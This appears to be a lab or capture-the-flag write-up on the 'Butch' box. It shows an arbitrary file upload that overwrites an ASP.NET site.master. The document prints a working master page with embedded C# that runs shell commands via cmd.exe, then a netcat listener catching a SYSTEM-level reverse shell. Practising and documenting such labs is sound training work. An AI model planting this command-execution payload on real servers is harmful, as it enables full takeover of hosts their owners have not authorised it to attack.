Arbitrary File Upload


The site.master file appears to reside in the web root, and the file upload functionality writes into that same directory. It may therefore be possible to overwrite site.master. ASP.NET master pages can contain embedded C# (site.master.txt explicitly states the backend is C#), and ASP.NET recompiles a master page when the file on disk changes, so a successful overwrite followed by a page reload should execute the embedded code under the IIS worker process identity, giving RCE.

<%@ Language="C#" src="site.master.cs" Inherits="MyNamespaceMaster.MyClassMaster" %>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
	<head runat="server">
		<title>Butch</title>
		<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
		<meta name="application-name" content="Butch">
		<meta name="author" content="Butch">
		<meta name="description" content="Butch">
		<meta name="keywords" content="Butch">
		<link media="all" href="style.css" rel="stylesheet" type="text/css" />
		<link id="favicon" rel="shortcut icon" type="image/png" href="favicon.png" />
	</head>
	<body>
		<div id="wrap">
			<div id="header">Welcome to Butch Repository</div>
			<div id="main">
				<div id="content">
					<br />
					<asp:contentplaceholder id="ContentPlaceHolder1" runat="server"></asp:contentplaceholder>
					<br />
				</div>
			</div>
		</div>
	</body>
</html>
 
<%
// Inline server-side code block: runs the command through cmd.exe,
// captures its standard output and writes it into the rendered page.
// It executes with the identity of the IIS application pool.
string stdout = "";
string cmd = "whoami";
System.Diagnostics.ProcessStartInfo procStartInfo = new System.Diagnostics.ProcessStartInfo("cmd", "/c " + cmd);
procStartInfo.RedirectStandardOutput = true;   // capture stdout instead of discarding it
procStartInfo.UseShellExecute = false;         // required for output redirection
procStartInfo.CreateNoWindow = true;
System.Diagnostics.Process p = new System.Diagnostics.Process();
p.StartInfo = procStartInfo;
p.Start();
stdout = p.StandardOutput.ReadToEnd();
Response.Write(stdout);                        // command output appears in the HTTP response
%>

Uploading the crafted site.master with this embedded payload and then reloading any page that uses the master page executes cmd /c whoami on the server.

Code execution confirmed: the output of whoami is written into the HTTP response.

Uploading an updated site.master whose command connects back to a listener on port 450, then reloading the page, yields a shell:

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/butch]
└─$ nc -nvlp 450
listening on [any] 450 ...
connect to [192.168.45.221] from (UNKNOWN) [192.168.238.63] 49696
Microsoft Windows [Version 10.0.17763.1217]
(c) 2018 Microsoft Corporation. All rights reserved.
 
c:\windows\system32\inetsrv> whoami
nt authority\system
 
c:\windows\system32\inetsrv> hostname
butch
 
c:\windows\system32\inetsrv> ipconfig
 
Windows IP Configuration
 
 
Ethernet adapter Ethernet0:
 
   Connection-specific DNS Suffix  . : 
   Link-local IPv6 Address . . . . . : fe80::86c:e5b9:f976:d9fa%6
   IPv4 Address. . . . . . . . . . . : 192.168.238.63
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.238.254

System-level compromise: the IIS application pool runs as nt authority\system, so the reverse shell obtained through the master page overwrite already has full control of the host.